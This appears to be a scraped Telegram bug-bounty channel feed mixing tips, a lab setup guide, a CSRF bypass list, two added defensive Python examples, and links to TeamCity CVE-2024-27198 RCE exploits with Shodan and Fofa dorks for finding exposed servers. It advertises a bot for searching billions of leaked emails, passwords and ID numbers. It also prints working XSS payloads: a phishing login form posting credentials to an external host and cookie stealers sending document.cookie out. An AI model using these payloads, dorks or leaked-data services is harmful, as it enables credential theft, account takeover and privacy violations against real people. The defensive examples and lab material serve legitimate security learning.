Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

💧 At the moment, our bot is loaded with 2078 leaks. ✏️ In total they contain 52.536.415.358 records. 😲 This is more than any other telegram bot! 🔎 The following data is available for search: 📩Email: 23.841.454.924 👤Full name: 9.297.275.706 📞Telephone: 6.820.638.162 👤Nick: 4.576.677.061 🔑Password: 2.777.429.639 🃏Document Number: 1.487.310.933 🆔VK ID: 1.193.605.990 ⓕFacebookID: 824.900.847 🎯IP: 453.335.698 🔗Link: 301.684.979 🏢Company name: 297.019.478 🚘Vehicle number: 284.274.869 🌐Domain: 180.748.922 ✈TelegramID: 154.968.917 📷Instagram ID: 45.089.233

Thread by @tabaahi_ on Thread Reader App – Thread Reader App https://threadreaderapp.com/thread/1571386282835873792.html

Thanks a lot guys, you guys are giving me the positivity to go forward and learn new things

700 guys 😍😍

Heroku api key, this much what should I have to do

How to find Broken Authentication in 30 seconds or less using Autorize
👉 Set up Autorize in Burp:
1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column

🚨 Here is a list of WP-exposed (wp-config sensitive) files! 🚨
/wp-config.php-backup
/wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php
/wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
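For site owners, an added example (not part of the original post) that walks a WordPress document root on disk and reports leftover copies of wp-config that the web server could hand out as plain text. It generalises the list above to any file whose name starts with `wp-config` other than `wp-config.php` itself; the function names and the sample tree are assumptions.

```python
import os
import tempfile


def find_config_leftovers(webroot):
    """Return sorted webroot-relative paths of wp-config copies left on disk."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), webroot)
            rel = rel.replace(os.sep, "/")
            # Editor swap files start with a dot, backups carry extra suffixes.
            is_copy = (name.lstrip(".").startswith("wp-config")
                       and name != "wp-config.php")
            # The one entry on the list that does not follow the naming pattern.
            is_private_json = rel == "_wpeprivate/config.json"
            if is_copy or is_private_json:
                hits.append(rel)
    return sorted(hits)


def demo():
    """Scan a constructed webroot (sample files, not real configuration)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "_wpeprivate"))
        for rel in ["wp-config.php", "wp-config.php.bak", ".wp-config.php.swp",
                    "wp-config.php~", "index.php", "_wpeprivate/config.json"]:
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("constructed sample\n")
        return find_config_leftovers(root)


if __name__ == "__main__":
    for path in demo():
        print("remove or move outside the webroot:", path)
```

Anything it reports should be deleted or moved outside the document root, and the database credentials and salts rotated if the file was reachable.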

Bugbounty Practice Lab by TCM Security. Follow this guide to set it up in Kali Linux!

Step 1: Installing required packages
sudo apt update
sudo apt upgrade
sudo apt install docker.io
sudo apt install docker-compose
Restart your Kali VM.

Step 2: Unpack the labs
Copy the labs to a directory on your system (e.g. /home/kali/labs)
cd /home/kali/labs
unzip bugbounty-v1.0.zip
cd bugbounty
sudo docker-compose up
The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds.

Step 3: Setup permissions
In a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks.
./set-permissions.sh
Browse to http://localhost
The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage.

Enjoy your labs!

bugbounty-v1.1.zip (12.78 MB)

🌟 DNS Enumeration 🌟
1. DIG: - Importance: Command-line tool for querying DNS information.
2. Host: - Importance: Command-line utility for DNS queries.
3. NMAP (dns-brute script): - Importance: Network scanning tool to identify subdomains and IPs.
4. DNS Recon: - Importance: Dedicated tool for automated DNS information gathering.
5. SecurityTrails: - Importance: Online service for historical DNS data exploration.

Importance of DNS Enumeration:
- Subdomain Discovery: Identify potential entry points.
- IP Address Mapping: Understand target infrastructure.
- Vulnerability Assessment: Spot DNS misconfigurations.
- Attack Surface Mapping: Identify hosts and services.
- Information Gathering: Extract valuable domain-related data.

DNS enumeration is vital for comprehensively understanding a target's infrastructure and potential vulnerabilities during security assessments.

CSRF - Bypasses
1. Remove the entire token parameter with value/Remove just the value.
2. Use any other random but same length token.
3. Use any other random (length-1) or (length+1) token.
4. Use attacker's token in victim's session.
5. Change the method from POST to GET and remove the token.
6. If request is made through PUT or DELETE then try POST
7. If token is sent through custom header; try to remove the header.
8. Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/xml, application/xml.
9. If double submit token is there (in cookies and some header) then try CRLF injection.
10. Bypassing referrer check:
i. If the referrer header is checked but only when it exists in the request then add this piece of code in your csrf poc:
<meta name="referrer" content="never">
ii. Regex Referral bypass:
11. CSRF token stealing via xss/htmli/cors.
12. JSON Based:
i. Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data and check if it accepts.
ii. Use flash + 307 redirect.
13. Guessable CSRF token.
14. Clickjacking to strong CSRF token bypass.
15. Type Juggling.
16. Array: newemail=victim@gmail.com&csrftoken[]=lol
17. Set the csrf token to "null" or add null bytes.
18. Check whether csrf token is sent over http or sent to 3rd party. See here
19. Generate multiple csrf tokens, observe the static part. Keep it as it is and play with the dynamic part.
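The server-side view of the list above, as an added example that is not part of the original post: a flawed token check next to a fail-closed one, both run against several of the listed request shapes (items 1, 2, 4, 5, 16). The function names, session ids and the HMAC-derived token scheme are assumptions made for the demo.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # demo key (assumption); use a managed secret


def issue_token(session_id):
    """Derive the token from the session id so it is useless in any other session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def weak_check(method, params, issued):
    """Flawed pattern: validate only on POST and only when a token was sent."""
    if method != "POST":
        return True                       # items 5 and 6: other methods skip the check
    token = params.get("csrftoken")
    if not token:
        return True                       # item 1: missing or empty token is accepted
    return token in issued                # item 4: any issued token, not session-bound


def strict_check(method, params, session_id):
    """Fail closed: one method, token mandatory, string-typed, bound to the session."""
    if method != "POST":
        return False                      # the state-changing route accepts POST only
    token = params.get("csrftoken")
    if not isinstance(token, str) or not token:
        return False                      # missing, empty or array-valued (item 16)
    return hmac.compare_digest(token.encode(), issue_token(session_id).encode())


def run_cases():
    """Return {case: (weak_result, strict_result)} for requests in alice's session."""
    alice, mallory = "sess-alice", "sess-mallory"   # constructed session ids
    issued = [issue_token(alice), issue_token(mallory)]
    cases = {
        "legitimate": ("POST", {"csrftoken": issued[0]}),
        "token removed": ("POST", {}),
        "same-length random": ("POST", {"csrftoken": secrets.token_hex(32)}),
        "other session's token": ("POST", {"csrftoken": issued[1]}),
        "method changed to GET": ("GET", {}),
        "array parameter": ("POST", {"csrftoken": ["lol"]}),
    }
    return {name: (weak_check(m, p, issued), strict_check(m, p, alice))
            for name, (m, p) in cases.items()}

if __name__ == "__main__":
    print(*(f"{n}: weak={w} strict={s}" for n, (w, s) in run_cases().items()), sep="\n")
```

Every forged shape that the weak check lets through is rejected by the strict one, while the legitimate request passes both.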

If you got a chance to choose one thing! What will you choose? Guys let's discuss 🤘

<A HREF="http://evil.com/">Login Here </A>
<script>document.location.href="http://evil.com"</script>
<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'

iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>

cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>
<script>document.body.background="https://www.jhadol.com/images/photos/original/1465212129eukl.jpg";</script>
<script>window.location="https://coffinxp.000webhostapp.com/coffinxp1.html";</script>
<script>document.body.bgColor="red";</script>

if you guys like this give me a reaction guys.

Good morning, I have created a video on how to use @cipherinfo_bot; I have shown the demo here, you guys can check it out. Caution: education purpose only, I am not liable for anything.

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity exploit
https://github.com/W01fh4cker/CVE-2024-27198-RCE
https://github.com/Chocapikk/CVE-2024-27198
https://github.com/rapid7/metasploit-framework/pull/18922

Cyberspace Mapping Dork:
Fofa
app="JET_BRAINS-TeamCity"

ZoomEye
app:"JetBrains TeamCity"

Hunter.how
product.name="TeamCity"

Shodan
http.component:"teamcity"
Read research: https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/